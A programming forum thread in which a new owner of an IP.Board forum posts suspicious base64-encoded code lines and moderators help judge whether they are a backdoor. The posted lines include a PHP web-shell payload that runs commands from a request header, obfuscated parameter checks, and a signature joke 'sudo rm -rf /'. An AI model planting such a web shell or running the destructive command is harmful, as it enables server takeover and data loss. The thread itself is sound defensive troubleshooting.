Do you mind if I ask how you obtained these files?
Did someone put them in there for a purpose or did you download a theme/plugin?
I'm just looking to avoid such complications
(on a side note, i've never seen a virus in PHP before)
Register and join over 40,000 other developers!
Recent Topics
-
Delete accountpindo - Jul 23 2020 01:33 AM
-
Print specific values from dictionary with a specific key nameSiten0308 - Jun 20 2019 01:43 PM
-
Learn algorithms and programming conceptsjohnnylo - Apr 23 2019 07:49 AM
-
Job Gig PHP Form NeededPJohnson - Apr 18 2019 03:55 AM
-
How to make code run differently depending on the platform it is running on?xarzu - Apr 05 2019 09:17 AM
Recent Blog Entries
Recent Status Updates
Popular Tags
- networking
- Managed C++
- stream
- console
- database
- authentication
- Visual Basic 4 / 5 / 6
- session
- Connection
- asp.net
- import
- syntax
- hardware
- html5
- array
- mysql
- java
- php
- c++
- string
- C#
- html
- loop
- timer
- jquery
- ajax
- javascript
- programming
- android
- css
- assembly
- c
- form
- vb.net
- xml
- linked list
- login
- encryption
- pseudocode
- calculator
- sql
- python
- setup
- help
- game
- combobox
- binary
- hello world
- grid
- innerHTML
15 replies to this topic
#13
Poe
-
- Advanced Member
-
- 81 posts
CC Resident
Posted 04 November 2014 - 08:43 PM
"Portability is for those who can't write new programs" - Linus Torvalds
#14
Keslaw
-
- New Member
-
- 7 posts
CC Lurker
Posted 05 November 2014 - 12:13 AM
I bought this forum. Everything were disactivated till now.
Another suspicious files lines:
\forum\admin\applications\core\modules_public\task\manualResolver.php (1 hit)
Line 129: print base64_decode( "R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" );
\forum\admin\applications\forums\modules_admin\statistics\stats.php (1 hit)
Line 359: $content = base64_decode( "R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" );
\forum\admin\applications\forums\modules_public\extras\stats.php (4 hits)
Line 497: if ( ($this->request['s'] == trim( $this->_myRot13( base64_decode("aHR5bF9ieXFfem5nZw==") ) ) ) and ( $this->request['t'] == "" ) )
Line 509: @header( $this->_myRot13( base64_decode("UGJhZ3JhZy1nbGNyOiB2em50ci90dnM=") ) );
Line 511: echo base64_decode($string);
Line 1019: echo base64_decode( "R0lGODlhhgAfAMQAAAAAAP///+/v79/f38/Pz7+/v6+vr5+fn4+Pj4CAgHBwcGBgYFBQUEBAQDAwMCAgIBAQE" .
\forum\admin\setup\sources\classes\output\publicOutput.php (3 hits)
Line 2876: if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
Line 2876: if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
Line 2876: if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
\forum\admin\sources\classes\output\publicOutput.php (3 hits)
Line 2876: if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
Line 2876: if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
Line 2876: if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
\forum\admin\sources\loginauth\openid\Auth\OpenID\Association.php (1 hit)
Line 495: $secret = base64_decode($secret);
\forum\admin\sources\loginauth\openid\Auth\OpenID\BigMath.php (1 hit)
Line 227: $b64 = base64_decode($str);
\forum\cache\hdinstall.php (10 hits)
Line 4: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> =================================== Line 12: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> =================================== Line 16: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> =================================== Line 24: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> =================================== Line 28: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> =================================== Line 36: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> =================================== Line 40: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> =================================== Line 48: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> =================================== Line 52: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> =================================== Line 60: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Another: http://pastebin.com/BkQWjtvm
\forum\ips_kernel\classCaptchaPlugin\default.php (1 hit)
Line 227: print base64_decode( "R0lGODlhyAA8AJEAAN/f3z8/P8zMzP///yH5BAAAAAAALAAAAADIADwAAAL/nI+py+0Po5y02ouz3rz7D4biSJbmiabqyrbuC8fyTNf2jef6zvf+DwwKh8Si8YhMlgACwEHQXESfzgOzykQAqgMmFMr9Rq+GbHlqAFsFWnFVrfwIAvQAu15P0A14Nn8/ADhXd4dnl2YYCAioGHBgyDbnNzBIV0gYxzEYWdg1iLAnScmFuQdAt2UKZTcl+mip+HoYG+tKOfv3N5l5garnmPt6CwyaFzrranu7i0crObvoaKvMyMhrIQhFuyzcyGwXcOpoLYg7DGsZXk5r6DSN51RNfF0RPU5sy7gpnH5bjLhrk7Y9/RQNisfq2CRJauTR6xUuFyBx/yrWypMMmTlq/9IwQnKWcKG5cvMeShBIMOFIaV9w2eti6SBABAyjvBRFMaZCMaxsqtxl8iShjpj+VfqGCJg4XzOfJCK5DVWliFNXlSIENKjWrVy7ev0KNqzYsWTFwhlFU8waLk+efGF7hi0aSgu3iGmV1cxdoGTinimbiGOeP8SWhps6z3AkeMMWW20mMykqQyuJDbYWdufKBJWc2uWmAJZdO0yOKfTCCqHGiO4E/oKGriTYaBw5g/MDqynNlW9Uhmx66tM2i05dNcM8O6Rg2MHLYKraLTpDcLebTke4APkcduAoku0DWpe24MI96ewZPdiy6Rlx/0Y+XJevlNu/z6vtlHFxZbpv9f9edYkfxgVmjnqSxXYOYPfFVMgXIHGC0ltWDNXYJ6Lsw82AFVpWEk4pEabgbsfBM5FphyDWRh1OLCUgbC06NtNU6UV1T1Jl3YhjjjruyGOPPv4IZJBC6tDXGUDB4UUaK06RhRl/0aWWF3CR4YWESraR1ZCh6dMOiMNIFE2GI/bRJYiIEeULiloyUNSFLzWC3VXcqEJXTBe1qApDpbXUEYxr2tYeQCyyGMuIcxbokHfPvPjHf2...
\forum\ips_kernel\classGraph.php (1 hit)
Line 6015: $errorIconData = base64_decode( 'R0lGODlhKQAlAPf/AP34o/75s6qGFOTi2/32jbKSIvXfTPHqy/Hx8fz3mfz2kvTcQfLx6dTDdf78ybaZNcStXPfjWqF8Df35uv'.
#15
dargueta
-
- Moderator
-
- 4854 posts
I chown trolls.
Posted 05 November 2014 - 10:58 AM
None of these look particularly suspicious on their own. Can you please post the full files? Just put them in a .zip file and attach that to your post.
Edited by dargueta, 05 November 2014 - 10:58 AM.
sudo rm -rf / && echo $'Sanitize your inputs!'
#16
Alexander
-
- Moderator
-
- 3963 posts
YOL9
Posted 05 November 2014 - 04:29 PM
In the captcha plugin, you will notice upon decoding that the first three characters are GIF - signifying it is simply encoded binary data that the author chose to pack in to a string rather than supply as an image separately, while the 'stats' binary appears to be a very small GIF, probably a tracking pixel for legitimate purposes (one of the ROT13 encoded strings is "ugly_old_matt", curiously.) Their objective was to blend in with the valid files, making removal difficult as you may take out of course real files.
In these situations unless there exists a script someone wrote to remove such a backdoor from your IPB installation, the best option will be to write down which plugins it uses, back up the database after checking its contents are what you expect, and installing a new and possibly less vulnerable version of IPB.
Alexander.
All new problems require investigation, and so if errors are problems, try to learn as much as you can and report back.
Recommended from our users: Dynamic Network Monitoring from WhatsUp Gold from IPSwitch. Free Download
